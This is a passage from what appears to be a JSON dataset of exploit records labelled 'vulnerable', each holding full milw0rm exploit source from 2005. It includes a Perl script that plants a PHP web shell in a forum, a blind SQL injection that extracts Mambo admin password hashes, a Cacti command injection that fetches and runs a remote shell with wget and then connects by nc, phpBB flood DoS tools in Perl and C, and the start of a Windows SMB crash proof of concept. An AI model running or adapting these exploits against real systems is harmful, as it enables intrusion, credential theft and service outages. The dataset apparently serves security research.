/(.*)<\\/textarea>/) { $data .= $1; $p = 0; }\n\n $data .= $res if $p;\n\n if($res =~ s/(.*)(<textarea)([^<>]*)([>])(.*)/$5/) { $data .= $res; $p = 1; }\n\n}\n\n\n\nif(length($data)>0) { print \" DONE ]\\n\"; }\n\nelse { print \" FAILED ]\\n\"; exit(); }\n\n\n\nif($data =~ /rst_ghc/)\n\n {\n\n if($cmd eq 'create') { print \"SHELL ALREADY EXIST!\"; exit(); }\n\n if($cmd eq 'delete') \n\n  {  \n\n  print \"SHELL EXIST.\\nDELETING SHELL.\\n\"; \n\n  $data =~ s/\\s*<\\? if\\(\\$_GET\\[rst_ghc\\]\\)\\{ passthru\\(\\$_GET\\[rst_ghc\\]\\); \\} \\?>//g;\n\n  }\n\n }\n\nelse\n\n {\n\n if($cmd eq 'create') \n\n  {\n\n  $data .= \"\\n\";\n\n  $data .= '<? if($_GET[rst_ghc]){ passthru($_GET[rst_ghc]); } ?>';\n\n  }\n\n if($cmd eq 'delete') { print \"SHELL NOT EXIST. CAN'T DELETE.\"; exit(); }\n\n }\n\n\n\n$data =~ s/(.)/\"%\".uc(sprintf(\"%2.2x\",ord($1)))/eg;\n\n$post = \"message=${data}&form_h=yes&style_edit_ok=%C8%E7%EC%E5%ED%E8%F2%FC\";\n\nprint \"CREATE NEW STYLE ...[\";\n\n$sock = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$host\", PeerPort => \"80\") || die \"[-] CONNECT FAILED\\r\\n\";\n\nprint $sock \"POST ${path}admin/style_edit.php HTTP/1.1\\n\";\n\nprint $sock \"Host: $host\\n\";\n\nprint $sock \"Cookie: board_user_cook=$cook;board_user_id=$id\\n\";\n\nprint $sock \"Content-Type: application/x-www-form-urlencoded\\n\";\n\nprint $sock \"Content-length: \".length($post).\"\\n\\n\";\n\nprint $sock \"$post\";\n\nprint $sock \"\\n\\n\";\n\nprint \" DONE ]\\n\"; \n\nif($cmd eq 'create') { print \"SHELL CREATED SUCCESSFULLY! NOW YOU CAN TRY EXECUTE COMMAND.\"; }\n\nif($cmd eq 'delete') { print \"SHELL DELETED!\"; }\n\n}\n\nelse\n\n{\n\nhead();\n\nprint \">>> COMMAND EXECUTE\\n\";\n\n$sock = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$host\", PeerPort => \"80\") || die \"[-] CONNECT FAILED\\n\";\n\nprint $sock \"GET ${path}index.php?rst_ghc=echo%20_START_%20$cmdspl%20$cmd%20$cmdspl%20echo%20_END_%20; HTTP/1.1\\n\";\n\nprint $sock \"Host: $host\\n\";\n\nprint $sock \"Accept: */*\\n\";\n\nprint $sock \"Connection: close\\n\\n\";\n\n\n\nwhile ($res = <$sock>)\n\n{\n\n if($res =~ /^_END_/) { $p = 0; }\n\n $data .= $res if $p;\n\n if($res =~ /^_START_/) { $p = 1; }\n\n}\n\nif(length($data)>0) { \n\n                      print \"-----------------------------------------------------------------\\n\"; \n\n                      print $data; \n\n                      print \"-----------------------------------------------------------------\\n\";\n\n                      exit(0);\n\n                    }\n\nelse { print \"[-] FAILED\\nMaybe you forget create shell first?\\n\"; exit(0); }\n\n\n\n}\n\n\n\nsub usage()\n\n{\n\n head();\n\n print \" USAGE : r57frb.pl [options]\\n\\n\";\n\n print \" Options: \\n\";\n\n print \"          -h - host e.g. '127.0.0.1' , 'www.frb.ru'\\n\";\n\n print \"          -p - path to forum e.g. '/frb/' , '/forum/'\\n\";\n\n print \"          -u - admin username e.g. 'admin'\\n\";\n\n print \"          -i - admin id e.g. '1'\\n\";\n\n print \"          -c [create|delete|cmd]\\n\";\n\n print \"              create - for create shell\\n\";\n\n print \"              delete - for delete shell\\n\";\n\n print \"              cmd - any command for execute\\n\";\n\n print \"-----------------------------------------------------------------\\n\"; \n\nexit(0);\n\n}\n\n\n\nsub head()\n\n{\n\n print \"-----------------------------------------------------------------\\n\";\n\n print \"Forum Russian Board 4.0 Full command execution exploit by RST/GHC\\n\";\n\n print \"-----------------------------------------------------------------\\n\";\n\n}\n\n\n\n# milw0rm.com [2005-06-21]",
335        "vulnerable": true
336    },
337    {
338        "exploit_id": 1061,
339        "content": "#!/usr/bin/perl\n\n\n\n### Mambo <= 4.5.2.1, MySQL => 4.1 sql injection exploit by RST/GHC\n\n### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n### (c)oded by 1dt.w0lf , 21.06.05\n\n### http://rst.void.ru , http://ghc.ru\n\n### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n\n\n\n\nuse IO::Socket;\n\n\n\nif (@ARGV < 3) { &usage; }\n\n\n\n$server    = $ARGV[0];\n\n$path      = $ARGV[1];\n\n$member_id = $ARGV[2];\n\n\n\n$news_id = 1;\n\n$news_itemid = 1;\n\n\n\n$server =~ s!(http:\\/\\/)!!;\n\n\n\n$request  = 'http://';\n\n$request .= $server;\n\n$request .= $path;\n\n\n\n$s_num = 1;\n\n$|++;\n\n$n = 0;\n\n&head;\n\nprint \"\\r\\n\";\n\nprint \" [~]  SERVER : $server\\r\\n\";\n\nprint \" [~]    PATH : $path\\r\\n\";\n\nprint \" [~] USER ID : $member_id\\r\\n\";\n\nprint \" [~] SEARCHING PASSWORD ... [|]\";\n\n\n\nwhile(1)\n\n{\n\nif(&found(47,58)==0) { &found(96,103); } \n\n$char = $i;\n\nif ($char==\"0\") \n\n { \n\n if(length($allchar) > 0){\n\n print qq{\\b\\b DONE ] \n\n ---------------------------------------------------------------\n\n USER ID : $member_id\n\n    HASH : $allchar\n\n ---------------------------------------------------------------\n\n };\n\n }\n\n else\n\n {\n\n print \"\\b\\b FAILED ]\";\n\n }\n\n exit();  \n\n }\n\nelse \n\n {  \n\n $allchar .= chr($char); \n\n }\n\n$s_num++;\n\n}\n\n\n\nsub found($$)\n\n {\n\n my $fmin = $_[0];\n\n my $fmax = $_[1];\n\n if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }\n\n \n\n $r = int($fmax - ($fmax-$fmin)/2);\n\n $check = \"/**/BETWEEN/**/$r/**/AND/**/$fmax\";\n\n if ( &check($check) ) { &found($r,$fmax); }\n\n else { &found($fmin,$r); }\n\n }\n\n \n\nsub crack($$)\n\n {\n\n my $cmin = $_[0];\n\n my $cmax = $_[1];\n\n $i = $cmin;\n\n while ($i<$cmax)\n\n  {\n\n  $crcheck = \"=$i\";\n\n  if ( &check($crcheck) ) { return $i; }\n\n  $i++;\n\n  }\n\n $i = 0;\n\n return $i;\n\n }\n\n \n\nsub check($)\n\n {\n\n $n++;\n\n status();\n\n $ccheck = $_[0]; \n\n $sock1 = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"80\");\n\n printf $sock1 (\"GET %sindex.php?option=com_content&task=vote&id=%d&Itemid=%d&cid=1&user_rating=1,rating_count=(SELECT/**/if((ascii(substring((SELECT/**/password/**/FROM/**/mos_users/**/WHERE/**/id=%d),%d,1)))%s,1145711457,0)),lastip=666/* HTTP/1.0\\nHost: %s\\nAccept: */*\\nConnection: close\\n\\n\",\n\n $path,$news_id,$news_itemid,$member_id,$s_num,$ccheck,$server); \n\n sleep 1; \n\n $sock2 = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"80\");\n\n printf $sock2 (\"GET %sindex.php?option=com_content&task=view&id=%d&Itemid=%d&cid=1 HTTP/1.0\\nHost: %s\\nAccept: */*\\nConnection: close\\n\\n\",\n\n $path,$news_id,$news_itemid,$server);\n\n\n\n while(<$sock2>) \n\n  {   \n\n  if (/1145711457/) { return 1; }\n\n  } \n\n\n\n return 0;\n\n }\n\n \n\nsub status()\n\n{\n\n  $status = $n % 5;\n\n  if($status==0){ print \"\\b\\b/]\";  }\n\n  if($status==1){ print \"\\b\\b-]\";  }\n\n  if($status==2){ print \"\\b\\b\\\\]\"; }\n\n  if($status==3){ print \"\\b\\b|]\";  }\n\n}\n\n\n\nsub usage()\n\n {\n\n &head;\n\n print q(\n\n USAGE\n\n    r57mambo.pl [HOST] [/FOLDER/] [USER_ID]\n\n  \n\n OPTIONS\n\n    HOST    - Host where mambo installed\n\n    FOLDER  - Folder where mambo installed\n\n    USER_ID - User ID for brute (default is 62 for admin)\n\n  \n\n E.G.\n\n    r57mambo.pl http://blah.com /mambo/ 62\n\n ---------------------------------------------------------------\n\n (c)oded by 1dt.w0lf\n\n RST/GHC , http://rst.void.ru , http://ghc.ru\n\n );\n\n exit();\n\n }\n\nsub head()\n\n {\n\n print q(\n\n ---------------------------------------------------------------\n\n Mambo <= 4.5.2.1, MySQL => 4.1 sql injection exploit by RST/GHC\n\n ---------------------------------------------------------------\n\n );\n\n }\n\n\n\n# milw0rm.com [2005-06-21]",
340        "vulnerable": true
341    },
342    {
343        "exploit_id": 1062,
344        "content": "# Note:\n\n# This exploit contains backdoor shell code that is not located on this server.\n\n# /str0ke \n\n\n\n#!/usr/bin/perl\n\n#\n\n# Remote Command Execution Exploit for Cacti <= 0.8.6d\n\n#\n\n# This exploit open a remote shell on the targets that uses Cacti\n\n# TARGET HOST MUST BE A GNU/LINUX SERVER, if not:\n\n# manual exploiting --> http://www.example.com/cacti/graph_image.php?local_graph_id=[valid_value]&graph_start=%0a[command]%0a\n\n# Patch: download the last version http://www.cacti.net/download_cacti.php\n\n# Discovered and Coded by Alberto Trivero\n\n\n\nuse LWP::Simple;\n\n\n\nprint \"\\n\\t===============================\\n\";\n\nprint \"\\t= Exploit for Cacti <= 0.8.6d =\\n\";\n\nprint \"\\t=      by Alberto Trivero     =\\n\";\n\nprint \"\\t===============================\\n\\n\";\n\n\n\nif(@ARGV<2 or !($ARGV[1]=~m/\\//)) {\n\n   print \"Usage:\\nperl $0 [target] [path]\\n\\nExamples:\\nperl $0 www.example.com /cacti/\\n\";\n\n   exit(0);\n\n}\n\n\n\n$page=get(\"http://\".$ARGV[0].$ARGV[1].\"graph_view.php?action=list\") || die \"[-] Unable to retrieve: $!\";\n\nprint \"[+] Connected to: $ARGV[0]\\n\";\n\n$page=~m/local_graph_id=(.*?)&/ || die \"[-] Unable to retrieve a value for local_graph_id\";\n\nprint \"[~] Sending exploiting request, wait for some seconds/minutes...\\n\";\n\nget(\"http://\".$ARGV[0].$ARGV[1].\"graph_image.php?local_graph_id=$1&graph_start=%0acd /tmp;wget http://server/shell.pl;chmod 777 shell.pl;perl shell.pl%0a\");\n\nprint \"[+] Exploiting request done!\\n\";\n\nprint \"[*] Now try on your box: nc -v $ARGV[0] 4444\\n\";\n\n\n\n# milw0rm.com [2005-06-22]",
345        "vulnerable": true
346    },
347    {
348        "exploit_id": 1063,
349        "content": "#!/usr/bin/perl\n\n##  Name: NsT-phpBBDoS (Perl Version)\n\n##  Copyright: Neo Security Team\n\n##  Author: HaCkZaTaN\n\n##  Ported: g30rg3_x\n\n##  Date: 20/06/05\n\n##  Description: NsT-phpBB DoS By HackZatan Ported tu perl By g30rg3_x\n\n##               A Simple phpBB Registration And Search DoS Flooder.\n\n## \n\n##  g30rg3x@neosecurity:/home/g30rg3x# perl NsT-phpBBDoS.pl\n\n##  [+] \n\n##  [+] NsT-phpBBDoS v0.2 by HaCkZaTaN\n\n##  [+] ported to Perl By g30rg3_x\n\n##  [+] Neo Security Team\n\n##  [+]\n\n##  [+] Host |without http://www.| victimshost.com\n\n##  [+] Path |example. /phpBB2/ or /| /phpBB2/\n\n##  [+] Flood Type |1=Registration 2=Search| 1\n\n##  [+] ..........................................................\n\n##  [+] ..........................................................\n\n##  [+] ..........................................................\n\n##  [+] ..............................................\n\n##  [+] The Socket Can't Connect To The Desired Host or the Host is MayBe DoSed\n\n##  g30rg3x@neosecurity:/home/g30rg3x# echo \"Let see how many users I have created\"\n\n\n\nuse IO::Socket;\n\n\n\n## Initialized X\n\n$x = 0;\n\n\n\n## Flood Variables Provided By User\n\nprint q(\n\nNsT-phpBBDoS v0.2 by HaCkZaTaN\n\nported to Perl By g30rg3_x\n\nNeo Security Team\n\n\n\n);\n\nprint q(Host |without http://www.| );\n\n$host = <STDIN>;\n\nchop ($host);\n\n\n\nprint q(Path |example. /phpBB2/ or /| );\n\n$pth = <STDIN>;\n\nchop ($pth);\n\n\n\nprint q(Flood Type |1 = Registration, 2 = Search| );\n\n$type = <STDIN>;\n\nchop ($type);\n\n\n\n## If Type Is Equals To 1 or Registration\n\nif($type == 1){\n\n\n\n## User Loop for 9999 loops (enough for Flood xDDDD)\n\nwhile($x != 9999)\n\n{\n\n\n\n## Building User in base X\n\n$uname = \"username=NsT__\" . \"$x\";\n\n\n\n## Building User Mail in base X\n\n$umail = \"&email=NsT__\" . \"$x\";\n\n\n\n## Final String to Send\n\n$postit = \"$uname\".\"$umail\".\"%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=N%2FA&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=2&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit\";\n\n\n\n## Posit Length\n\n$lrg = length $postit;\n\n\n\n## Connect Socket with Variables Provided By User\n\nmy $sock = new IO::Socket::INET (\n\n                                 PeerAddr => \"$host\",\n\n                                 PeerPort => \"80\",\n\n                                 Proto => \"tcp\",\n\n                                );\n\ndie \"\\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\\n\" unless $sock;\n\n\n\n## Sending Truth Socket The HTTP Commands For Register a User in phpBB Forums\n\nprint $sock \"POST $pth\".\"profile.php HTTP/1.1\\n\";\n\nprint $sock \"Host: $host\\n\";\n\nprint $sock \"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*\\n\";\n\nprint $sock \"Referer: $host\\n\";\n\nprint $sock \"Accept-Language: en-us\\n\";\n\nprint $sock \"Content-Type: application/x-www-form-urlencoded\\n\";\n\nprint $sock \"Accept-Encoding: gzip, deflate\\n\";\n\nprint $sock \"User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\\n\";\n\nprint $sock \"Connection: Keep-Alive\\n\";\n\nprint $sock \"Cache-Control: no-cache\\n\";\n\nprint $sock \"Content-Length: $lrg\\n\\n\";\n\nprint $sock \"$postit\\n\";\n\nclose($sock);\n\n\n\n## Print a \".\" for every loop\n\nsyswrite STDOUT, \".\";\n\n\n\n## Increment X in One for every Loop \n\n$x++;\n\n}\n\n\n\n## If Type Is Equals To 2 or Search\n\n}\n\nelsif ($type == 2){\n\n\n\n## User Search Loop for 9999 loops (enough for Flood xDDDD)\n\nwhile($x != 9999)\n\n{\n\n## Final Search String to Send\n\n$postit = \"search_keywords=Neo+Security+Team+Proof+of+Concept+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=200\";\n\n\n\n## Posit Length\n\n$lrg = length $postit;\n\n\n\n## Connect Socket with Variables Provided By User\n\nmy $sock = new IO::Socket::INET (\n\n                                 PeerAddr => \"$host\",\n\n                                 PeerPort => \"80\",\n\n                                 Proto => \"tcp\",\n\n                                );\n\ndie \"\\nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!\\n\" unless $sock;\n\n\n\n## Sending Truth Socket The HTTP Commands For Send A BD Search Into phpBB Forums\n\nprint $sock \"POST $pth\".\"search.php?mode=results HTTP/1.1\\n\";\n\nprint $sock \"Host: $host\\n\";\n\nprint $sock \"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\\n\";\n\nprint $sock \"Referer: $host\\n\";\n\nprint $sock \"Accept-Language: en-us\\n\";\n\nprint $sock \"Content-Type: application/x-www-form-urlencoded\\n\";\n\nprint $sock \"Accept-Encoding: gzip, deflate\\n\";\n\nprint $sock \"User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\\n\";\n\nprint $sock \"Connection: Keep-Alive\\n\";\n\nprint $sock \"Cache-Control: no-cache\\n\";\n\nprint $sock \"Content-Length: $lrg\\n\\n\";\n\nprint $sock \"$postit\\n\";\n\nclose($sock);\n\n\n\n## Print a \".\" for every loop\n\nsyswrite STDOUT, \".\";\n\n\n\n## Increment X in One for every Loop\n\n$x++;\n\n}\n\n}else{\n\n## STF??? What Do You Type\n\n\tdie \"Option not Allowed O_o???\\n\";\n\n}\n\n\n\n# milw0rm.com [2005-06-22]",
350        "vulnerable": true
351    },
352    {
353        "exploit_id": 1064,
354        "content": "/*\n\n--------------------------------------------------------\n\n[N]eo [S]ecurity [T]eam [NST]\u00ae - Advisory #15 - 00/00/06\n\n--------------------------------------------------------\n\nProgram:  phpBB 2.0.15\n\nHomepage:  http://www.phpbb.com\n\nVulnerable Versions: phpBB 2.0.15 & Lower versions\n\nRisk: High Risk!!\n\nImpact: Multiple DoS Vulnerabilities.\n\n\n\n    -==phpBB 2.0.15 Multiple DoS Vulnerabilities ==-\n\n---------------------------------------------------------\n\n\n\n- Description\n\n---------------------------------------------------------\n\nphpBB is a high powered, fully scalable, and highly customizable\n\nOpen Source bulletin board package. phpBB has a user-friendly\n\ninterface, simple and straightforward administration panel, and\n\nhelpful FAQ. Based on the powerful PHP server language and your\n\nchoice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,\n\nphpBB is the ideal free community solution for all web sites.\n\n\n\n- Tested\n\n---------------------------------------------------------\n\nlocalhost & many forums\n\n\n\n- Explotation\n\n---------------------------------------------------------\n\nprofile.php << By registering as many users as you can.\n\nsearch.php  << by searching in a way that the db couln't observe it.\n\n\n\n- Exploit\n\n---------------------------------------------------------\n\n[C Source]\n\n/*\n\n  Name: NsT-phpBBDoS\n\n  Copyright: NeoSecurityteam\n\n  Author: HaCkZaTaN\n\n  Date: 19/06/05\n\n  Description: xD You must figure out the problem xD\n\n  \n\n  root@NeoSecurity:/home/hackzatan# pico NsT-phpBBDoS.c\n\n  root@NeoSecurity:/home/hackzatan# gcc NsT-phpBBDoS.c -o NsT-phpBBDoS\n\n  root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS\n\n  [+] NsT-phpBBDoS v0.1 by HaCkZaTaN\n\n  [+] NeoSecurityTeam\n\n  [+] Dos has begun....[+]\n\n  \n\n  [*] Use: ./NsT-phpBBDoS <path> <search.php or profile.php> <Host>\n\n  [*] Example: ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com\n\n  root@NeoSecurity:/home/hackzatan# ./NsT-phpBBDoS /phpBB/ profile.php Victimshost.com\n\n  [+] NsT-phpBBDoS v0.1 by HaCkZaTaN\n\n  [+] NeoSecurityTeam\n\n  [+] Dos has begun....[+]\n\n  \n\n  .................................\n\n  root@NeoSecurity:/home/hackzatan# echo \"Let see how many users I have created\"\n\n  root@NeoSecurity:/home/hackzatan# set | grep MACHTYPE\n\n  MACHTYPE=i486-slackware-linux-gnu\n\n  root@NeoSecurity:/home/hackzatan#\n\n\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n#include <errno.h>\n\n#ifdef WIN32\n\n#include <winsock2.h>\n\n#pragma comment(lib, \"ws2_32\")\n\n#pragma pack(1)\n\n#define WIN32_LEAN_AND_MEAN\n\n#else\n\n#include <unistd.h>\n\n#include <sys/types.h>\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n#include <arpa/inet.h>\n\n#include <netdb.h>\n\n#endif\n\n\n\n#define __USE_GNU\n\n#define _XOPEN_SOURCE\n\n\n\nint Connection(char *, int);\n\nvoid Write_In(int , char *, char *a, char *, int);\n\nchar Use(char *);\n\n\n\nint main(int argc, char *argv[])\n\n{\n\n    int sock, x = 0;\n\n    char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3];\n\n\n\n    puts(\"[+] NsT-phpBBDoS v0.1 by HaCkZaTaN\");\n\n    puts(\"[+] NeoSecurityTeam\");\n\n    puts(\"[+] Dos has begun....[+]\\n\");\n\n    fflush(stdout);\n\n\n\n    if(argc != 4) Use(argv[0]);\n\n\n\n    while(1)\n\n    {\n\n           sock = Connection(Host,80);\n\n           Write_In(sock, Path, Pro_Sea, Host, x);\n\n           #ifndef WIN32\n\n           shutdown(sock, SHUT_WR);\n\n           close(sock);\n\n           #else\n\n           closesocket(sock);\n\n           WSACleanup();\n\n           #endif\n\n           Pro_Sea = argv[2];\n\n           x++;\n\n    }\n\n    //I don't think that it will get here =) \n\n\n\n    return 0;\n\n}\n\n\n\nint Connection(char *Host, int Port)\n\n{\n\n        #ifndef WIN32\n\n        #define SOCKET int\n\n        #else\n\n        int error;\n\n        WSADATA wsadata;\n\n        error = WSAStartup(MAKEWORD(2, 2), &wsadata);\n\n\n\n        if (error == SOCKET_ERROR)\n\n        {\n\n                  perror(\"Could Not Start Up Winsock!\\n\");\n\n                  return;\n\n        }\n\n\n\n        #endif\n\n\n\n        SOCKET sockfd;\n\n        struct sockaddr_in sin;\n\n        struct in_addr  *myaddr;\n\n        struct hostent *h;\n\n        \n\n        if(Port <= 0 || Port > 65535)\n\n         {\n\n                  puts(\"[-] Invalid Port Number\\n\");\n\n                  fflush(stdout);\n\n                  exit(-1);\n\n         }\n\n        \n\n        if((sockfd =  socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)\n\n        {\n\n                    perror(\"socket() \");\n\n                    fflush (stdout);\n\n                    exit(-1);\n\n        }\n\n\n\n        if(isalpha(Host[0]))\n\n        {\n\n           if((h = gethostbyname(Host)) == NULL)\n\n           {\n\n                     perror(\"gethostbyname() \");\n\n                     fflush (stdout);\n\n                     exit(-1);\n\n           }\n\n        }\n\n        else\n\n        {\n\n              myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));\n\n              myaddr->s_addr=inet_addr(Host);\n\n              \n\n              if((h = gethostbyaddr((char *) &myaddr, sizeof(myaddr), AF_INET)) != NULL)\n\n              {\n\n                     perror(\"gethostbyaddr() \");\n\n                     fflush (stdout);\n\n                     exit(-1);\n\n              }\n\n        }\n\n\n\n        memset(&sin, 0, sizeof(sin));\n\n        sin.sin_family = AF_INET;\n\n        sin.sin_port = htons(Port);\n\n        memcpy(&sin.sin_addr.s_addr, h->h_addr_list[0], h->h_length);\n\n\n\n        if(connect(sockfd, (struct sockaddr *)&sin, sizeof(struct sockaddr_in)) < 0)\n\n        {\n\n                     perror(\"connect() \");\n\n                     exit (-1);\n\n        }\n\n\n\n        return sockfd;\n\n}\n\n\n\nvoid Write_In(int sock, char *Path, char *Pro_Sea, char *Host, int x)\n\n{\n\n    char *str1 = (char *)malloc(4*BUFSIZ), *str2 = (char *)malloc(4*BUFSIZ);\n\n    char *req0 = \"User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\\r\\n\"\n\n                 \"Accept: */*\\r\\n\"\n\n                 \"Accept-Language: en-us\\r\\n\"\n\n                 \"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n\"\n\n                 \"Accept encoding: gzip,deflate\\r\\n\"\n\n                 \"Keep-Alive: 300\\r\\n\"\n\n                 \"Proxy-Connection: keep-alive\\r\\n\"\n\n                 \"Content-Type: application/x-www-form-urlencoded\\r\\n\"\n\n                 \"Cache-Control: no-cache\\r\\n\"\n\n                 \"Pragma: no-cache\\r\\n\";\n\n    char *Profile = \"%40neosecurityteam.net&new_password=0123456&password_confirm=0123456&icq=&aim=&msn=&yim=&website=&location=&occupation=&interests=&signature=&viewemail=0&hideonline=0&notifyreply=0&notifypm=1&popup_pm=1&attachsig=1&allowbbcode=1&allowhtml=0&allowsmilies=1&language=english&style=1&timezone=0&dateformat=D+M+d%2C+Y+g%3Ai+a&mode=register&agreed=true&coppa=0&submit=Submit\\r\\n\";\n\n    char *Search  = \"&search_terms=any&search_author=*&search_forum=-1&search_time=0&search_fields=all&search_cat=-1&sort_by=0&sort_dir=DESC&show_results=topics&return_chars=200\\r\\n\";\n\n\n\n    if(strcmp(\"profile.php\", Pro_Sea) == 0) sprintf(str1, \"username=NsT__%d&email=NsT__%d%s\", x, x, Profile);\n\n    else if(strcmp(\"search.php\", Pro_Sea) == 0)\n\n    {\n\n               Pro_Sea = \"search.php?mode=results\";\n\n               sprintf(str1, \"search_keywords=Hack%d%s\", x, Search);\n\n    }\n\n    else\n\n    {\n\n               puts(\"Sorry. Try making the right choice\");\n\n               exit(-1);\n\n    }\n\n\n\n    sprintf(str2, \"POST %s%s HTTP/1.1\\r\\n\"\n\n                  \"Host: %s\\r\\n\"\n\n                  \"Referer: http://%s/\\r\\n%s\"\n\n                  \"Content-Length: %d\\r\\n\\r\\n%s\", Path, Pro_Sea, Host, Host, req0, strlen(str1), str1);\n\n          \n\n    write(sock, str2, strlen(str2));\n\n    write(1, \".\", 1);\n\n    fflush(stdout);\n\n}\n\n\n\nchar Use(char *program)\n\n{\n\n\tfprintf(stderr,\"[*] Use: %s <path> <search.php or profile.php> <Host>\\n\", program);\n\n\tfprintf(stderr,\"[*] Example: %s /phpBB/ profile.php Victimshost.com\\n\", program);\n\n\tfflush(stdout);\n\n\texit(-1);\n\n}\n\n\n\n/*\n\n\n\n@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@\n\n'@@@@@''@@'@@@''''''''@@''@@@''@@\n\n'@@'@@@@@@''@@@@@@@@@'''''@@@\n\n'@@'''@@@@'''''''''@@@''''@@@\n\n@@@@''''@@'@@@@@@@@@@''''@@@@@\n\n\n\n*/\n\n\n\n// milw0rm.com [2005-06-22]",
355        "vulnerable": true
356    },
357    {
358        "exploit_id": 1065,
359        "content": "/*\n\n * Windows SMB Client Transaction Response Handling\n\n *\n\n * MS05-011\n\n * CAN-2005-0045\n\n *\n\n * This works against >> Win2k <<\n\n *\n\n * cybertronic[at]gmx[dot]net\n\n * http://www.livejournal.com/users/cybertronic/\n\n *\n\n * usage:\n\n * gcc -o mssmb_poc mssmb_poc.c\n\n * ./mssmb_poc\n\n *\n\n * connect via \\\\ip\n\n * and hit the netbios folder!\n\n *\n\n * ***STOP: 0x00000050 (0xF115B000,0x00000001,0xFAF24690,\n\n *                      0x00000000)\n\n * PAGE_FAULT_IN_NONPAGED_AREA\n\n *\n\n * The Client reboots immediately\n\n *\n\n * Technical Details:\n\n * -----------------\n\n *\n\n * The driver MRXSMB.SYS is responsible for performing SMB\n\n * client operations and processing the responses returned\n\n * by an SMB server service. A number of important Windows\n\n * File Sharing operations, and all RPC-over-named-pipes,\n\n * use the SMB commands Trans (25h) and Trans2 (32h). A\n\n * malicious SMB server can respond with specially crafted\n\n * Transaction response data that will cause an overflow\n\n * wherever the data is handled, either in MRXSMB.SYS or\n\n * in client code to which it provides data. One example\n\n * would be if the\n\n *\n\n * file name length field\n\n *\n\n * and the\n\n *\n\n * short file name length field\n\n *\n\n * in a Trans2 FIND_FIRST2 response packet can be supplied\n\n * with inappropriately large values in order to cause an\n\n * excessive memcpy to occur when the data is handled.\n\n * In the case of these examples an attacker could leverage\n\n * file:// links, that when clicked by a remote user, would\n\n * lead to code execution.\n\n *\n\n */\n\n\n\n#include <stdio.h>\n\n#include <sys/socket.h>\n\n#include <netinet/in.h>\n\n#include <netdb.h>\n\n\n\n#define PORT\t445\n\n\n\nunsigned char SmbNeg[] =\n\n\"\\x00\\x00\\x00\\x55\"\n\n\"\\xff\\x53\\x4d\\x42\"                 // SMB\n\n\"\\x72\"                             // SMB Command: Negotiate Protocol (0x72)\n\n\"\\x00\\x00\\x00\\x00\"                 // NT Status: STATUS_SUCCESS (0x00000000)\n\n\"\\x98\"                             // Flags: 0x98\n\n\"\\x53\\xc8\"                         // Flags2 : 0xc853\n\n\"\\x00\\x00\"                         // Process ID High: 0\n\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" // Signature: 0000000000000000\n\n\"\\x00\\x00\"                         // Reserved: 0000\n\n\"\\x00\\x00\"                         // Tree ID: 0\n\n\"\\xff\\xfe\"                         // Process ID: 65279\n\n\"\\x00\\x00\"                         // User ID: 0\n\n\"\\x00\\x00\"                         // Multiplex ID: 0\n\n\"\\x11\"                             // Word Count (WCT): 17\n\n\"\\x05\\x00\"                         // Dialect Index: 5, greater than LANMAN2.1\n\n\"\\x03\"                             // Security Mode: 0x03\n\n\"\\x0a\\x00\"                         // Max Mpx Count: 10\n\n\"\\x01\\x00\"                         // Max VCs: 1\n\n\"\\x04\\x11\\x00\\x00\"                 // Max Buffer Size: 4356\n\n\"\\x00\\x00\\x01\\x00\"                 // Max Raw Buffer 65536\n\n\"\\x00\\x00\\x00\\x00\"                 // Session Key: 0x00000000\n\n\"\\xfd\\xe3\\x00\\x80\"                 // Capabilities: 0x8000e3fd\n\n\"\\x52\\xa2\\x4e\\x73\\xcb\\x75\\xc5\\x01\" // System Time: Jun 20, 2005 12:08:32.327125000\n\n\"\\x88\\xff\"                         // Server Time Zone: /120 min from UTC\n\n\"\\x00\"                             // Key Length: 0\n\n\"\\x10\\x00\"                         // Byte Count (BCC): 16\n\n\"\\x9e\\x12\\xd7\\x77\\xd4\\x59\\x6c\\x40\" // Server GUID: 9E12D777D4596C40\n\n\"\\xbc\\xc0\\xb4\\x22\\x40\\x50\\x01\\xd4\";//              BCC0B422405001D4\n\n\n\nunsigned char SessionSetupAndXNeg[] = // 